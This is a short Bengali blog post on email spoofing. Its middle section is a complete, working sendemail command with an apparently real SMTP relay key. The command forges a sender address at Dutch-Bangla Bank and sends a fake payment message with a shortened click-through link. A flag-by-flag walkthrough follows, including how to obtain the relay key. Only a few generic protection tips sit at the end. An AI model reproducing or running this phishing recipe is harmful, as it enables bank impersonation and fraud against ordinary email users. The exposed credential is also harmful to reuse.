...
email spoofing

ইমেইল স্পুফিং(Email Spoofing) কি? এটি কিভাবে করা হয়? এর থেকে সুরক্ষিত থাকার উপায় কি?

ইমেইল স্পুফিং(Email Spoofing) কি?

 

ইমেইল স্পুফিং হল একটি সাইবার এটাক পদ্ধতি যেখানে একজন হ্যাকার বা এট্যাকার অন্য কোনো প্রতিষ্ঠান এর ইমেইল ব্যবহার করে ভুয়া ইমেইল পাঠায়। এটি ইমেইল হেডারের “প্রেরক” ক্ষেত্র বা একটি নকল ইমেল ঠিকানা ব্যবহার করে করা হয়। ইমেইল স্পুফিং এর উদ্দেশ্য হয় ব্যবহারকারীদের সম্পদের তথ্য সরবরাহ করার জন্য বা তাদের কম্পিউটারে ম্যালওয়্যার বা ফিসিং লিংক পাঠানোর জন্য। উদাহরণস্বরূপ, একজন হামলাকারী একটি ট্রাস্টেড সংস্থা হতে একটি ইমেইল প্রেরণ করতে পারে, যেখানে রিসিপিয়েন্টকে আহবান জানায় একটি সংস্থা থেকে একটি লিঙ্কে ক্লিক করতে। আর এতে তার কম্পিউটার বা সিস্টেম হ্যাক হয়ে যায়।

 

ইমেইল স্পুফিং(Email Spoofing) কিভাবে করা হয়?

 

sendemail -hh
sendemail -xu mia.039.03993@gmail.com -xp xsmtpsib-b9607cbb98c1764900faf234c89acc2d449f6058892c3707b726d1f95623c492-fFbvaSR1zqgHXt47 -s smtp-relay.sendinblue.com:587 -f ccs.cmc@dutchbanglabank.com -t mia.039@gmail.com -u you have a new payment! -m you got 10,000 bdt from manik ahmed. click here to get the payment. https://cutt.ly/djkfhkjsdh -o message-header=””From DBBL Support <ccs.cmc@dutchbanglabank.com>”

-xu: hacker’s original email
-xp: smtp api (signup sendinblue.com > Transactional > settings > configuration > Get Your SMTP key > create smtp key > use the key)
-s: smtp-relay.sendinblue.com:587
-f: spoofing email like bank email
-t: target email
-u: email subject
-m: email message or body text
-o: email header

email spoofing

email spoofing

ইমেইল স্পুফিং(Email Spoofing) থেকে সুরুক্ষিত থাকার উপায় কি?

 

– অজানা লিংক এ ক্লিক করা থেকে বিরত থাকুন।
– নিজের ইমেইল এড্রেস শেয়ার করার ক্ষেত্রে সাবধান থাকুন
– পাবলিক ব্যবহারের জন্য আলাদা ইমেইল ব্যবহার করুন
– নিজের সিস্টেম এর সফটওয়্যার আপডেটেড রাখুন

Share the Post:

Related Posts